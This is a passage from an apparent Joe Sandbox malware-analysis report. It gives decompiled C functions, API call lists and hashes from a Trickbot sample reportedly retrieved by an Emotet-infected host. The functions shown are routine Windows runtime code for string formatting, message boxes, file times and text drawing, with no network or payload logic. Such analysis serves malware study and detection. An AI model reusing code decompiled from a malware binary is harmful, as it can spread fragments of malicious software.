                          							_t45 =  &(_t45[1]);
                          							_t48 = _t48 + 1;
                          							continue;
                          						}
                          						_t22 =  *(_t48 + 1);
                          						if(_t22 < 0x30 || _t22 > 0x39) {
                          							if(_t22 < 0x41 || _t22 > 0x5a) {
                          								goto L31;
                          							} else {
                          								if(_t22 <= 0x39) {
                          									goto L26;
                          								}
                          								_t24 = _t22 - 0x38;
                          								goto L27;
                          							}
                          						} else {
                          							L26:
                          							_t24 = _t22 - 0x31;
                          							__eflags = _t24;
                          							L27:
                          							_t48 = _t48 + 2;
                          							if(_t24 < _a16) {
                          								_t25 =  *(_a12 + _t24 * 4);
                          								__eflags = _t25;
                          								if(_t25 != 0) {
                          									lstrcpyA(_t45, _t25);
                          									_t45 =  &(_t45[lstrlenA(_t45)]);
                          								}
                          							} else {
                          								 *_t45 = 0x3f;
                          								_t45 =  &(_t45[1]);
                          							}
                          							continue;
                          						}
                          					}
                          					__eflags = _t45 -  *_t37;
                          					return E00418246(_t37, _t45 -  *_t37, _t45 -  *_t37);
                          				} else {
                          					goto L1;
                          				}
                          				do {
                          					L1:
                          					_t42 =  *_t44;
                          					if(_t42 != 0x25) {
                          						L12:
                          						_t29 = _t42 & 0x000000ff;
                          						__eflags =  *(_t29 + 0x44d1e1) & 0x00000004;
                          						if(( *(_t29 + 0x44d1e1) & 0x00000004) != 0) {
                          							_t36 = _t36 + 1;
                          							_t44 = _t44 + 1;
                          							__eflags = _t44;
                          						}
                          						_t44 = _t44 + 1;
                          						__eflags = _t44;
                          						L15:
                          						_t36 = _t36 + 1;
                          						__eflags = _t36;
                          						goto L16;
                          					}
                          					_t30 =  *(_t44 + 1);
                          					if(_t30 < 0x30 || _t30 > 0x39) {
                          						if(_t30 < 0x41 || _t30 > 0x5a) {
                          							goto L12;
                          						} else {
                          							if(_t30 <= 0x39) {
                          								goto L8;
                          							} else {
                          								_t32 = _t30 - 0x38;
                          								goto L9;
                          							}
                          						}
                          					} else {
                          						L8:
                          						_t32 = _t30 - 0x31;
                          						__eflags = _t32;
                          						L9:
                          						_t44 = _t44 + 2;
                          						if(_t32 >= _a16) {
                          							goto L15;
                          						} else {
                          							_t33 =  *(_a12 + _t32 * 4);
                          							if(_t33 != 0) {
                          								_t36 = _t36 + lstrlenA(_t33);
                          							}
                          							goto L16;
                          						}
                          					}
                          					L16:
                          				} while ( *_t44 != 0);
                          				goto L17;
                          			}

                          APIs
                          • lstrlenA.KERNEL32(?,?,75B83F17,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 004289A2
                          • lstrcpyA.KERNEL32(00000001,?,00000000,?,75B83F17,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 00428A18
                          • lstrlenA.KERNEL32(00000001,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 00428A1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcpy
                          • String ID: \2B
                          • API String ID: 805584807-4014307851
                          • Opcode ID: c3cbc62e1abbadd03b5ddcb83fd82b2c2d62b62b5a175c7eecdc5ca825cbabdd
                          • Instruction ID: 3fea42ffe612ded21c97fb7ec65676f4904e051064c047fd2abf392999a505e0
                          • Opcode Fuzzy Hash: c3cbc62e1abbadd03b5ddcb83fd82b2c2d62b62b5a175c7eecdc5ca825cbabdd
                          • Instruction Fuzzy Hash: 4E31C7A030A1B64AE7218E29A84477E7BD9AB56354FD4249FD4C2C6247CE6C8CD3831F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E0042A6F8(void* __ecx, void* __eflags, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				struct tagRECT _v40;
                          				void* __ebp;
                          				intOrPtr _t56;
                          				signed char _t60;
                          				signed char _t65;
                          				intOrPtr _t67;
                          				signed int _t73;
                          				void* _t76;
                          				intOrPtr _t84;
                          				intOrPtr _t95;
                          
                          				_t56 = 1;
                          				_t76 = __ecx;
                          				_v24 = _t56;
                          				_v20 = _t56;
                          				_push(GetStockObject(0));
                          				_t84 = E00421789();
                          				_v16 = _t84;
                          				_v8 = E0042C740(__eflags);
                          				_t60 =  *(_t76 + 0x74);
                          				_v12 = _t84;
                          				if((0x0000a000 & _t60) == 0) {
                          					__eflags = _t60 & 0x00000050;
                          					if(__eflags == 0) {
                          						_v24 = GetSystemMetrics(0x20) - 1;
                          						_v20 = GetSystemMetrics(0x21) - 1;
                          						_t65 =  *(_t76 + 0x78);
                          						__eflags = 0x0000a000 & _t65;
                          						if((0x0000a000 & _t65) == 0) {
                          							L7:
                          							__eflags = _t65 & 0x00000050;
                          							if(__eflags == 0) {
                          								L10:
                          							} else {
                          								__eflags =  *(_t76 + 0x7c);
                          								if(__eflags == 0) {
                          									goto L10;
                          								} else {
                          									goto L9;
                          								}
                          							}
                          						} else {
                          							__eflags =  *(_t76 + 0x7c);
                          							if(__eflags != 0) {
                          								goto L7;
                          							}
                          						}
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_v12 = _v8;
                          					} else {
                          						goto L2;
                          					}
                          				} else {
                          					L2:
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          				}
                          				if(_a4 != 0) {
                          					_v20 = 0;
                          					_v24 = 0;
                          				}
                          				_t95 =  *0x44b354; // 0x1
                          				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
                          					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                          				}
                          				_t97 =  *(_t76 + 0x24);
                          				_t67 = _v8;
                          				if( *(_t76 + 0x24) == 0) {
                          					_t67 = _v16;
                          				}
                          				E0042C7B3( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                          				asm("movsd");
                          				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                          				asm("movsd");
                          				asm("movsd");
                          				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                          				asm("movsd");
                          				_t73 = 0 | _v12 == _v8;
                          				 *(_t76 + 0x24) = _t73;
                          				return _t73;
                          			}

                          APIs
                          • GetStockObject.GDI32(00000000), ref: 0042A70E
                            • Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
                            • Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
                            • Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798
                          • GetSystemMetrics.USER32(00000020), ref: 0042A754
                          • GetSystemMetrics.USER32(00000021), ref: 0042A75C
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0042A7B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
                          • String ID:
                          • API String ID: 419749085-0
                          • Opcode ID: dbc3407a905d228c6a97d3ec7e34fbcb0fbce310845c8d38f148d1b052413c06
                          • Instruction ID: 6708048f677f02915db4418b8f5470bb674ea32e0de7e6e0d0832b884b0f9e97
                          • Opcode Fuzzy Hash: dbc3407a905d228c6a97d3ec7e34fbcb0fbce310845c8d38f148d1b052413c06
                          • Instruction Fuzzy Hash: 5D417A71E002289FCF11CFA8D984A9EB7F5AF48310F5502A6ED10BB295D374AE41CF99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00436ABA(void* __ecx) {
                          				INT* _t43;
                          				CHAR* _t44;
                          				CHAR* _t47;
                          				CHAR* _t65;
                          				void* _t76;
                          				void* _t81;
                          				void* _t83;
                          
                          				E00405340(E00438638, _t81);
                          				_t43 =  *(_t81 + 0x20);
                          				_t65 = 0;
                          				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
                          				_t76 = __ecx;
                          				 *(_t81 - 0x14) = 0;
                          				 *((intOrPtr*)(_t81 - 0x18)) = 0;
                          				if(_t43 != 0) {
                          					L4:
                          					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
                          					 *(_t81 + 0x18) = _t44;
                          					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
                          						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
                          						E0042134C(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
                          					}
                          					E0041BE14( *(_t81 - 0x14));
                          					E0041BE14(_t65);
                          					_t47 =  *(_t81 + 0x18);
                          				} else {
                          					if( *(_t81 + 0x1c) != 0) {
                          						 *(_t81 - 4) = 0;
                          						 *(_t81 - 0x14) = E0041BDEB( *(_t81 + 0x1c) << 2);
                          						_t65 = E0041BDEB( *(_t81 + 0x1c));
                          						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
                          						E0043682F(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
                          						_t43 =  *(_t81 - 0x14);
                          						 *(_t81 + 0x18) = _t65;
                          						goto L4;
                          					} else {
                          						_t47 = 1;
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
                          				return _t47;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00436ABF
                          • ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 00436B4D
                          • GetTextAlign.GDI32(?), ref: 00436B62
                          • GetCurrentPositionEx.GDI32(?,?), ref: 00436B73
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Text$AlignCurrentH_prologPosition
                          • String ID:
                          • API String ID: 2331262098-0
                          • Opcode ID: abaa7a4edba41b073aae32f2fa436fc04e8b7b125ade37c73749b9c1282feb7e
                          • Instruction ID: 799bce53b743fd2dc915e6c1cec41ffad6423c0c15fdffbac9ccb4330ddc6879
                          • Opcode Fuzzy Hash: abaa7a4edba41b073aae32f2fa436fc04e8b7b125ade37c73749b9c1282feb7e
                          • Instruction Fuzzy Hash: 9E31157290021AAFCF119F95DC86CEFBF79FB08350F10412AF915A2260C7399A61DFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00428564(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
                          				struct HWND__* _v8;
                          				int _v12;
                          				struct HWND__* _v16;
                          				intOrPtr _v20;
                          				char _v280;
                          				struct HWND__* _t23;
                          				signed int _t32;
                          				intOrPtr _t34;
                          				long _t36;
                          				int _t38;
                          				intOrPtr _t41;
                          				CHAR* _t42;
                          				int _t43;
                          				long _t44;
                          
                          				_t41 = __ecx;
                          				_v20 = __ecx;
                          				E00428536(0);
                          				_t23 = E004286DC(0,  &_v8);
                          				_t44 = 0;
                          				_v16 = _t23;
                          				if(_t23 == 0) {
                          					L3:
                          					if(_t41 != 0) {
                          						_t5 = _t41 + 0x9c; // 0x9c
                          						_t44 = _t5;
                          					}
                          					L5:
                          					_v12 = 0;
                          					if(_t44 != 0) {
                          						_v12 =  *_t44;
                          						_t34 = _a12;
                          						if(_t34 != 0) {
                          							 *_t44 = _t34 + 0x30000;
                          						}
                          					}
                          					_t38 = _a8;
                          					if((_t38 & 0x000000f0) == 0) {
                          						_t32 = _t38 & 0x0000000f;
                          						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
                          							_t38 = _t38 | 0x00000030;
                          						}
                          					}
                          					if(_t41 == 0) {
                          						_t42 =  &_v280;
                          						GetModuleFileNameA(0,  &_v280, 0x104);
                          					} else {
                          						_t42 =  *(_t41 + 0x78);
                          					}
                          					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
                          					if(_t44 != 0) {
                          						 *_t44 = _v12;
                          					}
                          					if(_v8 != 0) {
                          						EnableWindow(_v8, 1);
                          					}
                          					E00428536(1);
                          					return _t43;
                          				}
                          				_t36 = SendMessageA(_v8, 0x376, 0, 0);
                          				if(_t36 == 0) {
                          					goto L3;
                          				} else {
                          					_t44 = _t36;
                          					goto L5;
                          				}
                          			}

                          APIs
                            • Part of subcall function 004286DC: GetParent.USER32(?), ref: 0042870F
                            • Part of subcall function 004286DC: GetLastActivePopup.USER32(?), ref: 0042871E
                            • Part of subcall function 004286DC: IsWindowEnabled.USER32(?), ref: 00428733
                            • Part of subcall function 004286DC: EnableWindow.USER32(?,00000000), ref: 00428746
                          • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0042859A
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00428608
                          • MessageBoxA.USER32(00000000,?,?,00000000), ref: 00428616
                          • EnableWindow.USER32(00000000,00000001), ref: 00428632
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                          • String ID:
                          • API String ID: 1958756768-0
                          • Opcode ID: 33d4c5790ab793b7e1332a0a122fb3979a15451c86d39661b82831e0f18052f1
                          • Instruction ID: e4e31f2271d95948c812669bcdce70faf8dade0d8038f471dba2f2254b6d18f2
                          • Opcode Fuzzy Hash: 33d4c5790ab793b7e1332a0a122fb3979a15451c86d39661b82831e0f18052f1
                          • Instruction Fuzzy Hash: 4021B672B01129BFDB209F94ECC1AEEB7B9EB44345F94042EE605E3240CB799D80CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041DF76(void* __ecx, char _a4) {
                          				struct _FILETIME _v12;
                          				struct _FILETIME _v20;
                          				struct _FILETIME _v28;
                          				void* _t29;
                          				void* _t30;
                          				long _t33;
                          				long _t34;
                          				intOrPtr _t43;
                          				signed int _t45;
                          				signed int _t46;
                          				void* _t54;
                          				CHAR* _t55;
                          				intOrPtr* _t56;
                          
                          				_t56 = _a4;
                          				_t54 = __ecx;
                          				E00405360(_t56, 0, 0x118);
                          				_t2 = _t56 + 0x12; // 0x41df72
                          				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
                          				_t29 =  *(_t54 + 4);
                          				_t46 = _t45 | 0xffffffff;
                          				if(_t29 == _t46) {
                          					L12:
                          					_t30 = 1;
                          					return _t30;
                          				}
                          				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
                          					L3:
                          					return 0;
                          				}
                          				_t33 = GetFileSize( *(_t54 + 4), 0);
                          				 *(_t56 + 0xc) = _t33;
                          				if(_t33 != _t46) {
                          					_t55 =  *(_t54 + 0xc);
                          					if( *((intOrPtr*)(_t55 - 8)) != 0) {
                          						_t34 = GetFileAttributesA(_t55);
                          						if(_t34 == _t46) {
                          							goto L5;
                          						}
                          						 *(_t56 + 0x10) = _t34;
                          						L8:
                          						 *_t56 =  *((intOrPtr*)(E00416006( &_a4,  &_v12, _t46)));
                          						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00416006( &_a4,  &_v20, _t46)));
                          						_t43 =  *((intOrPtr*)(E00416006( &_a4,  &_v28, _t46)));
                          						 *((intOrPtr*)(_t56 + 4)) = _t43;
                          						if( *_t56 == 0) {
                          							 *_t56 = _t43;
                          						}
                          						if( *((intOrPtr*)(_t56 + 8)) == 0) {
                          							_t24 = _t56 + 4; // 0xfffef685
                          							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
                          						}
                          						goto L12;
                          					}
                          					L5:
                          					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
                          					goto L8;
                          				}
                          				goto L3;
                          			}


                          APIs
                          • lstrcpynA.KERNEL32(0041DF72,?,00000104,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFA0
                          • GetFileTime.KERNEL32(00000000,0041DF60,?,?,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFC1
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFD0
                          • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFF1
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: File$AttributesSizeTimelstrcpyn
                          • String ID:
                          • API String ID: 1499663573-0
                          • Opcode ID: f895dba28c62974e6f72f5cb6fa42da3f4edf7303b6851ab21f8776e8f1f4b1a
                          • Instruction ID: 291008eaf6d4eed17b6ccbdf29df0a6571222242244954a0ad5250ebf2711d8c
                          • Opcode Fuzzy Hash: f895dba28c62974e6f72f5cb6fa42da3f4edf7303b6851ab21f8776e8f1f4b1a
                          • Instruction Fuzzy Hash: 823180B2500605AFC710DF61CC85EEBBBF8BB18310F10892EE552C7290E7B4A985CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E0042E5EE() {
                          				intOrPtr _t25;
                          				struct HWND__* _t26;
                          				struct HWND__* _t43;
                          				struct HWND__** _t50;
                          				void* _t52;
                          
                          				E00405340(E00437FEC, _t52);
                          				_t25 =  *0x447478; // 0x44748c
                          				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
                          				_t50 =  *(_t52 + 0xc);
                          				_t26 = _t50[2];
                          				_t43 = _t50[1];
                          				 *(_t52 - 4) = 0;
                          				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
                          					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
                          						goto L4;
                          					}
                          				} else {
                          					L4:
                          					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
                          				}
                          				if(_t43 == 0) {
                          					L8:
                          					_push(0x50);
                          					_push( *((intOrPtr*)(_t52 - 0x10)));
                          					_push( &(_t50[4]));
                          					if(_t50[2] != 0xfffffdf8) {
                          						E004182E9();
                          					} else {
                          						lstrcpynA();
                          					}
                          					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
                          					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
                          					_push(1);
                          					_pop(0);
                          				} else {
                          					if(E0041C702(_t43, _t52 - 0x110, 0x100) != 0) {
                          						E0041C729(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
                          						goto L8;
                          					}
                          				}
                          				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
                          				E00417EC8(_t52 - 0x10);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                          				return 0;
                          			}


                          APIs
                          • __EH_prolog.LIBCMT ref: 0042E5F3
                          • GetDlgCtrlID.USER32(?), ref: 0042E637
                          • lstrcpynA.KERNEL32(?,?,00000050), ref: 0042E67C
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042E69D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CtrlH_prologWindowlstrcpyn
                          • String ID:
                          • API String ID: 2888839504-0
                          • Opcode ID: 66a8672dd3d1165a0e2c465d095fbb80352f853bcff6ce8c0a50682a30807e96
                          • Instruction ID: d1a061f2199b96a1a8a7a75e3c56f39abbb0ccb82755a63e69b995dcefd57d30
                          • Opcode Fuzzy Hash: 66a8672dd3d1165a0e2c465d095fbb80352f853bcff6ce8c0a50682a30807e96
                          • Instruction Fuzzy Hash: 9521B372A00215ABDB30DFA6DC85BEEB7E8BF14314F84092EF561922D0D7B49984CB19
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E0040D5E8(void* __ecx) {
                          				int _t30;
                          				void* _t40;
                          				int _t42;
                          				short* _t44;
                          				int _t45;
                          				int _t48;
                          				void* _t49;
                          				short* _t51;
                          
                          				_t40 = __ecx;
                          				_t51 =  *(_t49 - 0x18);
                          				 *(_t49 - 0x24) = 0;
                          				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                          				_t45 =  *(_t49 + 0x14);
                          				_t42 = 1;
                          				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
                          					L8:
                          					_t30 = 0;
                          				} else {
                          					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
                          					 *(_t49 - 0x20) = _t48;
                          					if(_t48 == 0) {
                          						goto L8;
                          					} else {
                          						 *(_t49 - 4) = _t42;
                          						E00405B80(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
                          						 *(_t49 - 0x18) = _t51;
                          						_t44 = _t51;
                          						 *(_t49 - 0x28) = _t44;
                          						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                          						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
                          							goto L8;
                          						} else {
                          							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
                          						}
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
                          				return _t30;
                          			}


                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 0040D617
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0040D62A
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0040D676
                          • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040D68E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$CompareString
                          • String ID:
                          • API String ID: 376665442-0
                          • Opcode ID: dc2ad3bfe4d11ef9f3f749a97133c751e206c66b2d961d7dfe717cbb87ae37c0
                          • Instruction ID: 3391dc593a04c76d0e82be29b7ec3818955de7b566751aab4ad8b031ea50d394
                          • Opcode Fuzzy Hash: dc2ad3bfe4d11ef9f3f749a97133c751e206c66b2d961d7dfe717cbb87ae37c0
                          • Instruction Fuzzy Hash: 52210472D00249ABCF218FD4CC459DEBFB5FB48760F14452AFA18722A0C3369966DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041E102(intOrPtr _a4, struct _FILETIME* _a8) {
                          				struct _FILETIME _v12;
                          				struct _SYSTEMTIME _v28;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t30;
                          				int _t36;
                          				void* _t50;
                          
                          				_t47 = _a4;
                          				_v28.wYear =  *((intOrPtr*)(E00416052(_a4, 0, 0) + 0x14)) + 0x76c;
                          				_v28.wMonth =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 0x10)) + 1;
                          				_v28.wDay =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 0xc));
                          				_v28.wHour =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 8));
                          				_v28.wMinute =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 4));
                          				_t30 = E00416052(_t47, 0, 0);
                          				_v28.wMilliseconds = 0;
                          				_v28.wSecond =  *_t30;
                          				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
                          					E0041DA99(_t50, GetLastError(), 0);
                          				}
                          				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
                          				if(_t36 == 0) {
                          					return E0041DA99(_t50, GetLastError(), 0);
                          				}
                          				return _t36;
                          			}


                          APIs
                          • SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E17E
                          • GetLastError.KERNEL32(00000000), ref: 0041E18F
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041E19E
                          • GetLastError.KERNEL32(00000000), ref: 0041E1A9
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Time$File$ErrorLast$LocalSystem
                          • String ID:
                          • API String ID: 1172841412-0
                          • Opcode ID: f8898b07d4c5cea944e5b4a27e0b7a55bb33f669b060689bb7d031314a57ac4c
                          • Instruction ID: 07be1db4f399fb03fe53eb1ad788810041d99f30eb516af943a54ad3bde5bc43
                          • Opcode Fuzzy Hash: f8898b07d4c5cea944e5b4a27e0b7a55bb33f669b060689bb7d031314a57ac4c
                          • Instruction Fuzzy Hash: 0D116339A10215768F00FBE6C8458EFBBBEAF89304B05505BF91597221E6B4C981C7AD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E004110E0(void* __eflags, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v4;
                          				void* _t10;
                          				long _t13;
                          				long _t21;
                          				struct HWND__* _t25;
                          
                          				_t25 = _a4;
                          				_t10 = E004105F0(_t25);
                          				_t31 = _t10;
                          				if(_t10 != 0) {
                          					_t13 = GetPropA(_t25, 0);
                          					__eflags = _t13;
                          					if(_t13 == 0) {
                          						_t21 =  &_v4;
                          						_v4 = 0x29a;
                          						_t13 = SendMessageA(_t25, 0x1944, 0, _t21);
                          						__eflags = _v4 - 0x29a;
